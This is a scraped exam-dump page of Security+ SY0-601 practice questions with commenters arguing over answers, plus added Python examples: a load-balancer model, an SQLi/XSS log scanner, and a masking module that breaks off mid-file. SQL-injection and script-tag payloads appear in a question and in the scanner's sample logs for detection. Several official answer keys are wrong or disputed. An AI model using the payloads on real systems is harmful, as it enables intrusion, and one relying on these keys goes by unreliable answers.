SY0-601 Exam - Update 23 January 2023

Uploaded by dapismurf1

2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 1/539

Topic 1 - Single Topic

Question #1 Topic 1

A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL,
https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when
visiting http://www.anothersite.com. Which of the following describes this attack?

A. On-path

B. Domain hijacking

C. DNS poisoning

D. Evil twin

Correct Answer: B

Community vote distribution


C (62%) B (19%) Other

  comeragh Highly Voted  5 months ago


Selected Answer: C
I would go with C/DNS poisoning here.
upvoted 13 times

  SolventCourseisSCAM Highly Voted  3 months, 3 weeks ago


C is the correct answer. By the way, there is a course in North Carolina and they are receiving $4000 in advance and showing you 6-hour pre-recorded videos every Saturday. There is no human intervention and no update over time. They are lying and giving you fake promises before you sign up to the course, and then there is no contact after you become a member. Be careful because they are complete SCAMMERS.
upvoted 10 times

  DALLASCOWBOYS Most Recent  1 day, 9 hours ago


This is confirmed as Domain Hijacking
upvoted 3 times

  DALLASCOWBOYS 1 day, 9 hours ago


Due to getting the server warning on the one site and not the other site. If it was DNS poisoning, there would be a redirection to a malicious website. The question does not state that they were redirected, it just stated they did not get the cert warning on the other site. So site.com was domain hijacked.
upvoted 1 times

  Tornike 3 days, 22 hours ago


I took the exam yesterday, I only got 5-10% of these questions!
Total 82 questions
upvoted 2 times

  Iwannabeabadasshacker 2 days, 13 hours ago


bruh, you used contributor access?
upvoted 1 times

  EduardosSS 18 hours, 50 minutes ago


what is contributor access?
upvoted 1 times

  Tornike 2 days, 5 hours ago


YES, I used contributor access
upvoted 1 times

  thisguyfucks 5 days, 8 hours ago


Now looking at it: Domain Name Server (DNS) hijacking, also named DNS redirection, is a type of DNS attack in which DNS queries are incorrectly resolved in order to unexpectedly redirect users to malicious sites.

Domain Hijacking or Domain Spoofing is an attack where an organization's web address is stolen by another party. The other party changes the enrollment of another's domain name without the consent of its legitimate owner. This denies the true owner administrative access.

Seems like DNS poisoning is the best answer. What is confusing is that the site actually said domain hijacking was correct, but after looking this over I believe they are wrong.
upvoted 1 times

  thisguyfucks 5 days, 9 hours ago


This is extremely confusing: is it domain hijacking or DNS poisoning? How can we differentiate, given this ongoing discussion that seems split?
upvoted 2 times

  DALLASCOWBOYS 6 days, 22 hours ago


This is a poorly worded question, or some information is missing. It doesn't indicate the user proceeded to site.com, just indicates she received a warning. Then it doesn't say the user was redirected to anothersite.com, just indicates she did not receive a warning when visiting the other site. It seems like there is something missing that is not presented in the question listed. I have wasted too much time researching this.
upvoted 2 times

  DuoIsAlive 1 week ago


Selected Answer: A
ChatGPT
This issue is likely caused by a "Man-in-the-Middle (MitM)" attack, also known as an "On-path" attack. In this type of attack, an attacker
intercepts the communication between the user and the website, and presents a fake certificate to the user. This can happen if the attacker is
able to intercept the user's traffic, for example by being on the same network or by compromising a router or other network device.

The user is presented a certificate mismatch warning because the certificate presented by the attacker does not match the expected certificate
for the website, and the browser is warning the user that the website may not be the one they intended to visit.

Option A. On-path correctly describes the attack.


upvoted 1 times

  TheITguru 1 week, 1 day ago


This is domain hijacking. Where people seem to be confused is that one method to accomplish this is through DNS poisoning... but that's just one method of attack, and the answer domain hijacking would always be true to describe this, whereas DNS poisoning would maybe be true. Always go with the MOST RIGHT ANSWER! Yes, you could try to take over the certificate, but there are a number of real-world examples that show certificate mismatch after domain hijacking. Don't assume anything. Go off the question and choose the most right option. In this case it's domain hijacking, since it could always be used to describe this behavior, whereas DNS would only sometimes be used to create a scenario like this.
upvoted 1 times

  Chaz71 1 week, 1 day ago


Selected Answer: C
Seems like DNS
upvoted 2 times

  TinyTrexArmz 1 week, 2 days ago


Selected Answer: C
I believe both B and C could result in the experience described, but with domain hijacking the attacker has a better chance of tricking a Certificate Authority into providing/reissuing a trusted certificate. With DNS poisoning it seems very unlikely a trusted certificate could be taken and used on the server traffic is being redirected to.
upvoted 1 times

  shi_ 1 week, 2 days ago


I would say it is C; I've read many solutions and concluded it.
One of the clear explanations was: you can't do DNS poisoning on an HTTPS site, meaning that if you've done it there will be 2 options: you send your self-signed certificate, or you use the original certificate. But if you use the original, that means you can't get the private key (meaning no DNS poisoning), so you send your self-generated certificate and it comes out as a warning that the certificate is not verified (if you choose to ignore the warning then you've succeeded).
upvoted 2 times

  shi_ 1 week ago


Adding to it: domain hijacking means that you hijacked a domain and are using that domain to make a fake website acting as the real one. It is possible for a fake website to have a valid certificate; however, to support my statement, DNS poisoning on an HTTPS site means that you have a certificate mismatch (look at the question: you go to HTTPS and it said certificate mismatch).
upvoted 1 times

  amadeosmith 1 week, 3 days ago


I have the exam soon, could someone clarify what is the correct answer. The one most voted or the selected one? Thx
upvoted 1 times

  ronniehaang 1 week, 6 days ago


Selected Answer: C
This looks like a Pharming attack conducted by DNS poisoning
upvoted 1 times

  Chris518 2 weeks ago


Selected Answer: B
I feel like both (C) and (B) are correct answers but (C) is specific and the method is given while (B) is broad and can include DNS poisoning as
Hijacking goes one step further and changes the DNS settings while DNS Poisoning only redirects the traffic using the DNS records so unless
they give some specification on what is going on behind the scenes we cannot determine the answer between (B) and (C)
upvoted 2 times

  bsComptia 2 weeks, 4 days ago

This is ChatGPT's answer: It is difficult to determine which attack is most likely based on the information provided. Both a man-in-the-middle (MITM) and DNS poisoning attack would involve redirecting traffic to a malicious site and would result in a certificate mismatch warning. A domain hijacking attack would also result in traffic being redirected to a malicious site, but in this case, the attacker would have taken control of the domain name rather than intercepting the traffic.

It would be best to investigate the issue further by looking at the network traffic, verifying the SSL/TLS certificate, checking the DNS records and
also checking the domain registration details. It would also be helpful to check whether the company has adequate security measures in place,
such as firewalls and intrusion detection systems, to detect and prevent this type of attack.
upvoted 2 times

  TheITguru 1 week, 1 day ago


ChatGPT seems confused; there is no reference to intercepting traffic in the question. Without that to argue against, Domain Hijacking is the best answer of those available because it fits the scenario without assuming anything, and the attack described is definitely a form of Domain Hijacking since the URL is correct. It COULD be DNS poisoning, BUT there is no description of how this DNS attack would have worked. The question clearly asks what kind of attack this is. Where does it describe DNS being hacked, without assuming anything?
This is test-taking strategy. Don't assume anything!
upvoted 2 times

  emma234 3 weeks, 1 day ago


How do I know the correct answer?
upvoted 3 times

Question #2 Topic 1

Which of the following tools is effective in preventing a user from accessing unauthorized removable media?

A. USB data blocker

B. Faraday cage

C. Proximity reader

D. Cable lock

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
USB data blocker ->

A USB data blocker, also known as a “USB condom” (really, no kidding!), is a device that allows you to plug into USB charging ports including
charging kiosks, and USB ports on gadgets owned by other people.

The main purpose of using one is to eliminate the risk of infecting your phone or tablet with malware, and even prevent hackers to install/execute
any malicious code to access your data.
upvoted 9 times

  comeragh Highly Voted  5 months ago


Selected Answer: A
A is the only reasonable answer here I believe
upvoted 9 times

  Proctored_Expert Most Recent  1 month, 2 weeks ago


Selected Answer: A
One tool that is effective in preventing a user from accessing unauthorized removable media is a USB data blocker.

A USB data blocker is a device that is designed to block data transfer between a USB device and a computer, while still allowing power to flow
through the connection. This can be useful in preventing users from accessing unauthorized removable media, such as USB drives, external hard
drives, and other types of storage devices.
upvoted 1 times

  aktion 1 month, 3 weeks ago


Selected Answer: A
A is the answer. The remaining options do not meet the requirements as depicted in the question.
upvoted 1 times

  Nirmalabhi 3 months ago


Selected Answer: A
correct answer should be A.
upvoted 1 times

  JohnMangley 4 months ago


Selected Answer: A
Only A would prevent a user from accessing unauthorized removable media
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: A
It's the only one that doesn't let you receive info from the USB. (Removes the RX and TX from the cable; only lets power pass on the USB cable.)
upvoted 2 times

Question #3 Topic 1

A Chief Security Officer is looking for a solution that can provide increased scalability and flexibility for back-end infrastructure, allowing it to be
updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server
resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the
following would BEST meet the requirements?

A. Reverse proxy

B. Automated patch management

C. Snapshots

D. NIC teaming

Correct Answer: C

Community vote distribution


A (95%) 5%

  ender1701 Highly Voted  5 months ago


Selected Answer: A
I'm not sure who the "expert verifier" is for some of these answers, but there are multiple questions that have the wrong answer selected, such as
this question being labeled as answer "C", when the real answer is "A". A snapshot doesn't do anything listed in the question, it's just a snap of
the state of a server at a specific time, used to restore from backup. I advise all participants on this site to check your answers.
upvoted 18 times

  ronah 3 months, 3 weeks ago


Here is the thing about this website: CompTIA allows these sites as long as they don't give the right answer. This is the only place people made a comment or argued their answer. AND it does help you to search for the right answer as well. Where on earth do you get questions like these?
upvoted 13 times

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
It's the way to distribute load across different servers; at the same time you can remove from the cluster each server that you want to update.
upvoted 16 times

  Papee 3 months, 2 weeks ago


Why is this not NIC Teaming? Anybody with a better explanation?
upvoted 1 times

  Mercious 2 weeks, 3 days ago


They're looking for ways to provide increased scalability and flexibility for back-end infrastructure, not availability or fault tolerance. NIC
Teaming does not provide increased scalability and flexibility.
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


NIC Teaming combines the throughput of 2 or more network adapters to provide a higher speed than a single connection. This would help
with increasing the speed, but the requirements between the CSO and architect were increase scalability, increase flexibility, allowed to
make changes without service disruption, reduce back-end server resources, and session persistence being insignificant for the backend
applications. Since increased speed is not a requirement, NIC Teaming would NOT be the correct answer.
upvoted 2 times

  Joe1984 5 months ago


Agreed answer is A
upvoted 4 times

  thisguyfucks Most Recent  4 days, 7 hours ago


It's going to be A, reverse proxy.
upvoted 1 times

  TinyTrexArmz 1 week, 2 days ago


Selected Answer: A
While a Reverse Proxy is not in and of itself a load balancer, you can tell it a group of servers to direct traffic to. The problem is that since it's not a load balancer there's not a lot of intelligence to them in session management. In some cases some web applications require that they talk to the same webserver throughout the session. In the case of a reverse proxy it's going to pseudo-randomly direct each request to an available server, which is why the part about session reliability is in there. But as long as your pool of available servers can handle the amount of requests coming in, you can simply remove one or more from the pool and update them without messing up your users' experience.
upvoted 2 times

  Chris518 2 weeks ago


Selected Answer: C
This is tricky as (C) is not the BEST way but just the BEST out of the given options especially (A) is tricky as Reverse proxy while you can use it to
accomplish this. The capability to allow the version to update separately from any other service would be to take a Snapshot as Reverse proxy is
often notorious for breaking during updates as most reverse proxies are hardcoded to the current version.
upvoted 1 times

  Sandon 1 week, 1 day ago


Not even close
upvoted 1 times

  Zigster 1 month ago


Correct answer is A
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
A reverse proxy would best meet the requirements described.

A reverse proxy is a type of server that sits between a client and the back-end servers, forwarding requests from clients to the appropriate back-
end server and returning the response from the back-end server to the client. Reverse proxies can provide increased scalability and flexibility for
back-end infrastructure, as they allow the back-end servers to be updated and modified without disruption to services. They can also reduce the
load on back-end servers by offloading certain tasks, such as SSL termination, caching, and load balancing.

In this case, the security architect has highlighted that session persistence is not important for the applications running on the back-end servers,
indicating that a reverse proxy would be an appropriate solution.
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


NIC Teaming combines the throughput of 2 or more network adapters to provide a higher speed than a single connection. This would help with
increasing the speed, but the requirements between the CSO and architect were increase scalability, increase flexibility, allowed to make changes
without service disruption, reduce back-end server resources, and session persistence being insignificant for the backend applications. Since
increased speed is not a requirement, NIC Teaming would NOT be the correct answer.
upvoted 1 times

  okay123 1 month, 3 weeks ago


"The major benefit of load balancer scaling is that it provides scalability. Scalability is the ability of a networking device or application to handle
organic and planned network growth."

https://network-insight.net/2015/02/26/load-balancing-and-scale-out-
architectures/#:~:text=The%20major%20benefit%20of%20load,organic%20and%20planned%20network%20growth.
upvoted 1 times

  TonicMail 2 months, 3 weeks ago


It can be C as "has highlighted that session persistence is not important for the applications"
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Reverse Proxy - A reverse proxy is an application/server that sits in front of a web server that processes and forwards incoming client requests to
the appropriate server(s). This prevents the client from connecting directly to the origin server.
In this question, the officer needs to provide " increased scalability and flexibility for back-end infrastructure". Organizations can use a reverse
proxy to distribute traffic evenly and efficiently across multiple backend servers, if they want. This can prevent site shutdowns as traffic can be
rerouted to an alternative server instead of relying on one server. At the same time, you can choose to remove the server from production when
maintenance is needed without affecting the service.
upvoted 6 times
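The maintenance workflow described in this thread (take a backend out of the pool, update it, put it back, with no session stickiness to worry about) as an added Python model of the backend pool a reverse proxy selects from. This is example code written for this page, not code from ExamTopics or any proxy product; the backend names and the `patch` callback are constructed placeholders. It goes one step beyond the comments by refusing to drain the last healthy backend, the guard you want before starting a rolling update.

```python
from dataclasses import dataclass, field


@dataclass
class BackendPool:
    """Stateless round-robin pool: because no session persistence is required,
    any request may go to any healthy backend."""
    backends: list                      # constructed backend names, e.g. hostnames
    draining: set = field(default_factory=set)
    _counter: int = 0

    def active(self):
        return [b for b in self.backends if b not in self.draining]

    def drain(self, name):
        """Take a backend out of rotation before maintenance.
        Refuses if that would leave no backend to serve traffic."""
        if name not in self.backends:
            raise KeyError(name)
        if name not in self.draining and len(self.active()) <= 1:
            raise RuntimeError("refusing to drain the last healthy backend")
        self.draining.add(name)

    def restore(self, name):
        """Return an updated backend to rotation."""
        self.draining.discard(name)

    def choose(self):
        """Round-robin over the active backends."""
        candidates = self.active()
        if not candidates:
            raise RuntimeError("no healthy backend available")
        chosen = candidates[self._counter % len(candidates)]
        self._counter += 1
        return chosen


def route_requests(pool, n):
    """Simulate n independent client requests; returns the backend each was sent to."""
    return [pool.choose() for _ in range(n)]


def rolling_update(pool, patch):
    """Drain, patch and restore every backend in turn while traffic keeps flowing.
    Returns, per backend, the set of backends that served requests while it was out."""
    served_while_out = {}
    for name in list(pool.backends):
        pool.drain(name)
        served_while_out[name] = set(route_requests(pool, 6))
        patch(name)                     # placeholder for "apply updates and restart"
        pool.restore(name)
    return served_while_out


if __name__ == "__main__":
    pool = BackendPool(["app1", "app2", "app3"])
    print(rolling_update(pool, lambda name: print("patched", name)))
```

The model shows the property the question is after: during each step only the drained backend stops receiving requests, and the update is invisible to clients because nothing ties a client to one server.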

  Belayet 4 months, 2 weeks ago


Selected Answer: C
allowing it to be updated and modified without disruption to services
upvoted 2 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: A
The key here is "reduce the back-end server resources". A reverse proxy maintains the load over the servers by redirecting an adequate amount
of traffic towards it.
upvoted 4 times

  comeragh 5 months ago


Selected Answer: A
In computer networks, a reverse proxy is the application that sits in front of back-end applications and forwards client requests to those
applications. Reverse proxies help increase scalability, performance, resilience and security
upvoted 7 times

Question #4 Topic 1

Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?

A. A phishing email stating a cash settlement has been awarded but will expire soon

B. A smishing message stating a package is scheduled for pickup

C. A vishing call that requests a donation be made to a local charity

D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime

Correct Answer: C

Community vote distribution


A (88%) 10%

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
Answer is A
upvoted 16 times

  derfnick Highly Voted  5 months ago


Selected Answer: A
Because of the part "will expire soon"
upvoted 9 times

  thisguyfucks Most Recent  19 hours, 4 minutes ago


Selected Answer: A
IT'S "A"
upvoted 1 times

  thisguyfucks 4 days, 7 hours ago


Selected answer is A
upvoted 1 times

  DALLASCOWBOYS 6 days, 21 hours ago


A. expires soon
upvoted 1 times

  Nader_Wagih 1 week, 1 day ago


answer is A
upvoted 1 times

  Chris518 2 weeks ago


Selected Answer: A
What is with the answer? It is insane.
upvoted 1 times

  papahawaii 2 weeks ago


A- urgency being the key word. Who cares about some random donation to a charity, no urgency in that.
upvoted 1 times

  cryptodkey 2 weeks, 3 days ago


For me the type doesn't really matter now, because both mail and call have disadvantages over each other, so what matters now is the character trait involved. A has the character trait of urgency ("will soon expire"), but the call only requests a donation without any urgency involved. So I go with A.
upvoted 1 times

  Mercious 2 weeks, 3 days ago


Selected Answer: A
I think A is correct because of the will expire soon. Sense of urgency is time based and that's the only answer with such an actionable word.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
A phishing email stating a cash settlement has been awarded but will expire soon describes a social engineering technique that seeks to exploit a
person's sense of urgency.

Social engineering is the use of psychological manipulation or deception to influence people to divulge sensitive information or take actions that
may not be in their best interests. One common social engineering technique is to create a sense of urgency in the victim, often by using time-
limited offers or other time-sensitive incentives.

In this case, the phishing email claims that a cash settlement has been awarded, but will expire soon, creating a sense of urgency in the victim to
take action. This may motivate the victim to click on a link or provide sensitive information, without fully considering the consequences.
upvoted 1 times

  AidenB4704 1 month, 2 weeks ago


what should I pick on the actual test? I know it should be A but if I get this question should I pick A or C?
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
A phishing email stating a cash settlement has been awarded but will expire soon

Explanation: A social engineering technique that seeks to exploit a person's sense of urgency would be to send a phishing email stating that a
cash settlement has been awarded, but that it will expire soon if the recipient does not act quickly. This creates a sense of urgency in the
recipient, who may be more likely to click on a link or provide personal information in order to claim the settlement.

B. A smishing message stating a package is scheduled for pickup


C. A vishing call that requests a donation be made to a local charity
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime

All of these options could potentially be used as social engineering techniques, but they do not specifically seek to exploit a person's sense of
urgency.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
A. Urgency: when a good/bad deal is coming up to you, and you need to address/grab it fast within a period of time.
upvoted 1 times

  njinnc1123 1 month, 4 weeks ago


A is correct answer
upvoted 1 times

  Renfri 2 months ago


This is literally common sense
upvoted 1 times

  kerncc1 2 months ago


What about the fact that an email is not even guaranteed to be seen by the receiver. There's tons of emails in my inbox or spam folder that I
never even see for days or weeks. A phone call is something that you will get immediately if not at least you will receive a message. I don't know
if that has anything to do with it
upvoted 3 times

  Mr_BuCk3th34D 1 month, 3 weeks ago


Has nothing to do with it, the "sense of urgency" is not related to the social engineering method itself, but with the content of the message.
You're imposing your own context and personal opinion to a question that it was supposed to be generic. If you think about it, a phone call
might have the same issue, on my personal case for example, I don't accept calls from unknown numbers, what does that change with
regards to the sense of urgency being exploited? In a nutshell, it's not about the method, but the message itself.
upvoted 1 times

Question #5 Topic 1

A security analyst is reviewing application logs to determine the source of a breach and locates the following log:
https://www.comptia.com/login.php?id='%20or%20'1'1='1
Which of the following has been observed?

A. DLL Injection

B. API attack

C. SQLi

D. XSS

Correct Answer: C

Community vote distribution


C (100%)
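An added example of how an analyst would find this kind of entry in application logs, written for this page and not taken from ExamTopics or any commenter: the log lines below are constructed, and line 2 carries the same percent-encoded payload as the log in the question. Note that the question's string reads `'1'1='1` rather than the canonical `'1'='1` (one `=` is missing), so the detector keys on the `' or '` fragment, which is what makes the tautology, and flags it regardless. It also separates the classic SQL injection markers from a script tag, the distinction between options C and D.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed web-server log lines (not from the original page): a normal
# request, the question's payload, an apostrophe in ordinary data, a numeric
# tautology with a comment terminator, and a script tag (XSS, not SQLi).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2023:19:26:01] "GET /login.php?id=42 HTTP/1.1" 200
10.0.0.7 - - [04/Feb/2023:19:26:03] "GET /login.php?id='%20or%20'1'1='1 HTTP/1.1" 200
10.0.0.9 - - [04/Feb/2023:19:26:05] "GET /search.php?q=O%27Brien HTTP/1.1" 200
10.0.0.9 - - [04/Feb/2023:19:26:09] "GET /item.php?id=1%20OR%201%3D1-- HTTP/1.1" 200
10.0.0.3 - - [04/Feb/2023:19:26:11] "GET /profile.php?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Patterns run against the percent-decoded, lower-cased parameter value,
# never the raw URL, so URL encoding alone does not hide a payload.
SQLI_PATTERNS = [
    re.compile(r"'\s*or\s*'"),                 # quote-delimited tautology: ' or '1'='1
    re.compile(r"\bor\s+\d+\s*=\s*\d+"),       # numeric tautology: or 1=1
    re.compile(r"\bunion\s+(all\s+)?select\b"),
    re.compile(r"'\s*(--|#|/\*)"),             # quote closed, remainder commented out
]
XSS_PATTERNS = [
    re.compile(r"<\s*script"),
    re.compile(r"javascript\s*:"),
    re.compile(r"\bon[a-z]+\s*="),             # inline event-handler attribute
]


def classify_value(value):
    """Return 'sqli', 'xss' or None for one decoded parameter value."""
    v = value.lower()
    if any(p.search(v) for p in SQLI_PATTERNS):
        return "sqli"
    if any(p.search(v) for p in XSS_PATTERNS):
        return "xss"
    return None


def classify_request(target):
    """Decode each query parameter of a request target; (label, name, value) of the first hit."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        label = classify_value(value)
        if label:
            return label, name, value
    return None


def scan_log(text):
    """(line number, label, parameter, decoded value) for every suspicious request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hit = classify_request(match.group(1))
        if hit:
            findings.append((lineno,) + hit)
    return findings


if __name__ == "__main__":
    for lineno, label, param, value in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {label} in parameter {param!r}: {value!r}")
```

The apostrophe in `O'Brien` is left alone, which is the check worth keeping in mind: a lone quote in a parameter is normal data, while a quote followed by `or`, a comment terminator or a `UNION SELECT` is the pattern to alert on.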

  Joe1984 Highly Voted  5 months ago


Selected Answer: C
1=1 is true. SQL injection
upvoted 12 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


C. '1'1=1 is an indicator of an SQL injection.
upvoted 1 times

  xxxdolorxxx 2 weeks, 4 days ago


Selected Answer: C
I vote for C
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: C
SQLi (SQL injection) has been observed.

SQL injection is a type of cyber attack that involves injecting malicious code into a database through a vulnerable web application. The malicious
code is typically designed to manipulate or extract data from the database, allowing the attacker to gain unauthorized access to sensitive
information.

The log provided in the question appears to be a URL for a login page, with a string of text appended to the end. This string includes the text "or
'1'1='1", which is a common syntax used in SQL injection attacks. This indicates that an SQL injection attack may have been attempted or
successfully carried out against the website.
upvoted 2 times

  sauna28 1 month, 3 weeks ago


Selected Answer: C
1=1 is SQL INJECTION
upvoted 1 times

  BillHealy 3 months, 3 weeks ago


Selected Answer: C
Sql injection attempt
upvoted 1 times

  DCrest 4 months, 2 weeks ago


In an SQL injection attack, when a hacker enters " ' or 1 = 1 - - " in the user name and password field, why does this result in a successful login?
3 answers

16 votes:
The server interprets everything after the “—” as a comment, so ignores it.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: C
SQL injection for sure agreed.
upvoted 3 times
  stoneface 5 months, 1 week ago


Selected Answer: C
SQL Injection (SQLi) is a type of an injection attack that makes it possible to execute malicious SQL statements. These statements control a
database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: C
reason id='%20or%20'1'1='1
upvoted 2 times

  nobro1122 5 months, 1 week ago


This is correct.
upvoted 2 times

Question #6 Topic 1

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this
data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to BEST satisfy both the CPO's and the development team's
requirements?

A. Data anonymization

B. Data encryption

C. Data masking

D. Data tokenization

Correct Answer: A

Community vote distribution


A (70%) C (27%)

  Boogie_79 Highly Voted  5 months ago


Selected Answer: A
Data anonymization is the alteration process of personally identifiable information (PII) in a dataset, to protect individual identification. This way
the data can be used and still be protected.
upvoted 16 times

  TinyTrexArmz 1 week, 1 day ago


I agree this is the right answer in this case because Data Masking would not allow them to search for specific data results. BUT as a protector
of privacy you should be careful when implementing this solution as it takes a certain amount of data to truly make it to where a data analyst
cannot figure out individuals. (Source: My partner is a data analyst and she has to approve the use of anonymized data before it can be used
for testing such as this)
upvoted 1 times

  Proctored_Expert Highly Voted  1 month, 2 weeks ago


Selected Answer: C
Data masking would best satisfy both the CPO's and the development team's requirements.

Data masking is a technique for obscuring sensitive data in a database or other data store, while still preserving the structure and format of the
data. Data masking can be used to protect personally identifiable information (PII) or other sensitive data from being accessed or exposed in the
development environment.

In this case, the CPO is concerned about PII being utilized in the development environment, and is adamant that it must be removed. At the same
time, the development team needs real data in order to perform functionality tests and search for specific data. Data masking would allow the
CPO's requirement to be satisfied, while still providing the development team with real data to work with.
upvoted 5 times

  thisguyfucks Most Recent  1 day, 10 hours ago


Correct answer is C:
-Data masking[1][2] or data obfuscation[3] is the process of modifying sensitive data in such a way that it is of no or little value to unauthorized
intruders while still being usable by software or authorized personnel
upvoted 1 times

  thisguyfucks 1 day, 19 hours ago


I believe the correct answer is C please read the following:
Data masking is a way to create a fake, but a realistic version of your organizational data. The goal is to protect sensitive data, while providing a
functional alternative when real data is not needed—for example, in user training, sales demos, or software testing.
upvoted 1 times

  Nader_Wagih 1 week, 1 day ago


Selected Answer: A
Answer is A
upvoted 1 times

  shi_ 1 week, 2 days ago


Based on what I've read on the internet, my opinion would be A.
Both do protect data, but it is said data masking is used when real data is not needed.
upvoted 1 times

  mlonz 2 weeks, 6 days ago


Data Masking hides sensitive data by permanently replacing it with inauthentic data.

Anonymization attempts to permanently remove all PII within a data set to protect the privacy of individuals.
upvoted 1 times
  asum 3 weeks, 2 days ago
Selected Answer: C
C. Data masking can mean that all or part of the contents of a field are redacted, by substituting all character strings with "x" for example. A field might be partially redacted to preserve metadata for analysis purposes. For example, in a telephone number, the dialing prefix might be retained, but the subscriber number redacted. Data masking can also use techniques to preserve the original format of the field. Data masking is an irreversible deidentification technique.
upvoted 3 times

  Sandon 1 week, 1 day ago


That ain't it
upvoted 1 times

  creepyvirus 1 month, 2 weeks ago


Data masking could be used to remove PII from the development environment, while still allowing the development team to perform functionality tests and search for specific data. This would enable the team to continue testing and developing the critical application, while also satisfying the CPO's requirement to protect PII.

The other options listed (Data anonymization, Data encryption, and Data tokenization) may not fully address the specific requirements of this
scenario and may not allow the development team to test functionality and search for specific data.
upvoted 2 times

  shitgod 1 month, 2 weeks ago


The correct answer is definitely C...I'm a security beginner with a programming background. If the format of the data is part of the logic, the
program is not going to work if you take away the data.
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: A
Anonymization of data can still be used within the system but can't be reverted back to its original form. Just verified this by watching the CompTIA Security+ Andrew Ramdayal video.
upvoted 1 times

  Jimbobilly 1 month, 2 weeks ago


Selected Answer: C
Data anonymization is different from data masking in that it involves permanently removing the PII from the data, making it impossible to recover.
This means that the data is no longer realistic or usable for testing or development purposes.
upvoted 2 times

  Sandon 1 week, 1 day ago


Not even close
upvoted 1 times

  boog 1 month, 3 weeks ago


"without real data they cannot perform functionality tests and search for specific data"
anonymization changes the data and makes it unusable for these requirements.
C. Data masking
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
YES, DATA ANON. Tokenization is only used for card details.
upvoted 1 times

  Ranaer 2 weeks ago


This is not true. Yes, tokenization is used for CC details, but that doesn't mean it's restricted only to that. Tokenization is widely used for SSNs as well.
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: A
Ensuring full anonymization and preserving the utility of data for analysis is usually very difficult, however. Consequently, pseudo-anonymization methods are typically used instead. Pseudo-anonymization modifies or replaces identifying information so that reidentification depends on an alternate data source, which must be kept separate. With access to the alternate data, pseudo-anonymization methods are reversible.
upvoted 1 times

  Blueteam 2 months, 2 weeks ago


The correct answer is C. Data masking
The main reason for applying masking to a data field is to protect data that is classified as personally identifiable information, sensitive personal data, or commercially sensitive data. However, the data must remain usable for the purposes of undertaking valid test cycles.
upvoted 2 times

  Nirmalabhi 2 months, 3 weeks ago
Selected Answer: A
Correct answer is Data Anonymization
upvoted 1 times
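The masking techniques described in this thread (substituting characters with "x", keeping a dialing prefix, preserving the field's format, with no way back to the original value), as an added example that is not part of the original discussion; the record fields and sample values are constructed for the demo:

```python
"""Format-preserving, irreversible data masking for PII fields (added example)."""


def mask_phone(number: str, keep_prefix_digits: int = 4) -> str:
    """Keep the dialing prefix, replace the remaining subscriber digits with 'x'.

    Punctuation and spacing are copied through unchanged, so the masked value
    still looks like a phone number to code that validates the field's format.
    """
    seen = 0
    out = []
    for ch in number:
        if ch.isdigit():
            seen += 1
            out.append(ch if seen <= keep_prefix_digits else "x")
        else:
            out.append(ch)
    return "".join(out)


def mask_keep_last(value: str, keep: int = 4) -> str:
    """Redact every alphanumeric character except the last `keep` of them.

    Suits identifiers such as SSNs or account numbers where the trailing digits
    are retained as metadata for analysis (e.g. 'xxx-xx-6789'). keep=0 redacts all.
    """
    total = sum(ch.isalnum() for ch in value)
    to_redact = max(total - keep, 0)
    out, done = [], 0
    for ch in value:
        if ch.isalnum() and done < to_redact:
            out.append("x")
            done += 1
        else:
            out.append(ch)
    return "".join(out)


def mask_email(addr: str) -> str:
    """Keep the first character of the local part and the whole domain."""
    local, _, domain = addr.partition("@")
    if not domain:
        return "x" * len(local)  # not an address at all: redact fully
    return local[0] + "*" * (len(local) - 1) + "@" + domain


# Which masker applies to which field. Fields not listed are not PII and are
# passed through so functionality tests keep working on realistic records.
FIELD_MASKS = {
    "name": lambda v: mask_keep_last(v, 0),
    "phone": mask_phone,
    "ssn": mask_keep_last,
    "email": mask_email,
}


def mask_record(record: dict) -> dict:
    """Return a masked copy of one database row.

    The masks above use no key and no lookup table, so there is nothing that
    could turn the masked value back into the original; that is what makes
    masking irreversible, unlike tokenization, where a vault maps tokens back.
    """
    return {k: FIELD_MASKS[k](v) if k in FIELD_MASKS else v for k, v in record.items()}


# Constructed sample row, standing in for a production record copied to dev.
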